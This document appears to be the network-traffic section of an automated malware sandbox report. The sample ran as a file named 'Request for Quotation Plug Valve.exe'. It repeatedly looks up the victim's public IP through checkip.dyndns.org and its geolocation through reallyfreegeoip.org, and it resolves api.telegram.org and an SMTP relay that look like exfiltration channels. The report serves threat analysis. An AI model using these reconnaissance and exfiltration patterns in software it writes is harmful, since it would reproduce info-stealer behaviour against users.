Oct 8, 2024 15:10:17.914171934 CEST	1.1.1.1	192.168.2.6	0x5f09	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:17.914171934 CEST	1.1.1.1	192.168.2.6	0x5f09	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:20.784600019 CEST	1.1.1.1	192.168.2.6	0x3fd1	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:20.784600019 CEST	1.1.1.1	192.168.2.6	0x3fd1	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:22.826201916 CEST	1.1.1.1	192.168.2.6	0x5dd8	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:22.826201916 CEST	1.1.1.1	192.168.2.6	0x5dd8	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:32.188071012 CEST	1.1.1.1	192.168.2.6	0x6a93	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:38.469801903 CEST	1.1.1.1	192.168.2.6	0xe928	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:38.469801903 CEST	1.1.1.1	192.168.2.6	0xe928	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:38.469801903 CEST	1.1.1.1	192.168.2.6	0xe928	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Oct 8, 2024 15:10:38.469801903 CEST	1.1.1.1	192.168.2.6	0xe928	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49737	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:17.925327063 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:20.556535959 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0ae13e58f9c4bad2fb0c8ff59d745102 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 15:10:20.556983948 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0ae13e58f9c4bad2fb0c8ff59d745102 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 15:10:20.557005882 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0ae13e58f9c4bad2fb0c8ff59d745102 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 15:10:20.589606047 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 15:10:20.693608999 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9ee1f4e96a282165e1335f64812f5506 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 8, 2024 15:10:21.593852997 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 15:10:21.697854996 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a44b549a8d206d1230257526ab5cea2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49765	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:22.349164963 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 8, 2024 15:10:22.813498020 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3ca2be1293cb6e4084b4734b458ec05b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49774	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:23.446795940 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:24.944582939 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 439431ad3f8c12a8a9e80144bfd6f6a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49789	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:26.681273937 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:27.142234087 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 726cf8b577c57e515722ccb3e9f9d908 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49801	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:27.791939020 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:28.267467022 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e530f9288053b6068e9d3af9050829a8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49808	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:28.937613964 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:29.397955894 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2d475e75cbe7598206e5498ef82b7761 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49816	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:30.009635925 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:30.488385916 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0673f31efbb95bf6c9e47bcede18dbeb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49828	193.122.130.0	80	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:10:31.097845078 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 8, 2024 15:10:31.552058935 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63f81b34dbf79fd72ebb87be419b7710 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49752	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 13:10:21 UTC	670	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59353 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNsxYhDgZzb7tsnfERSDfBFnsgim9gZ8jr3iqmd7UDl62TZgTYmE2AATFi8bxxJyHsHPuPcN9lkBCUfB64Ns68ZjWopdkrKwNefKpyfxj1Z1Z4r7c1H6Vj4EodF0VLakmf6RxDbL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65ee04a8a72ad-EWR
2024-10-08 13:10:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49761	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 13:10:22 UTC	706	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59354 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUw9xVZ%2By2zNkhvFibmZmGWGxJeXamhDjRcHMkbh6d0xUNtzodPYluIiw1AsZPveAgiqVQNUtlNGgrZor0vQQ6udVIdWGLvlKzLaRerKiRLocFjhvD5%2FEEDCptrtg%2FWDdiuaC1WR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65ee529fcc45c-EWR alt-svc: h3=":443"; ma=86400
2024-10-08 13:10:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49769	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:23 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 13:10:23 UTC	684	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59355 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgkaMKddmiWFLPPnUl85PpP9UfTxJFgQj%2FvAiBxQVs%2BdS%2Bf5AxCSG%2FEoWALWE54z6zqHkJnT0VM7O36Vgeh6%2FFrpyf7h%2FcR%2FF30nDvp830ZPKre76ne4yGM0HXuwAYuImZjFRRIN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65eec18e643df-EWR
2024-10-08 13:10:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49784	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:25 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 13:10:25 UTC	674	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59357 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VrFue2BfRazTNv5%2Bfzhd1rply0MVobGGA5T6RXGeIkdKne44wAtiJUKptLPJZe2m2zV6oae7YujhuQB4ej0KgYIEn6VJQ7vfUXPFa1WOGly0nNR0EYvckV6T1HBt%2BhF1IjGorDqL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65ef97d5e41e3-EWR
2024-10-08 13:10:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 13:10:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49795	188.114.96.3	443	6456	C:\Users\user\Desktop\Request for Quotation Plug Valve.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 13:10:27 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 13:10:27 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 13:10:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 59359 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4g52iLa53DHdalyiVmKF4ZJCXmeR6a4KW7nq7H%2FCrnNoy5wZHeubWh8HnjodGOP%2BhefMTLeQZ1ydRMvk6lfLAW7uuEiGQqyQErSXLxQtXZNc2pYoGgZP4JpImdV5gSBe%2FQJRgoEa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf65f072db441a6-EWR
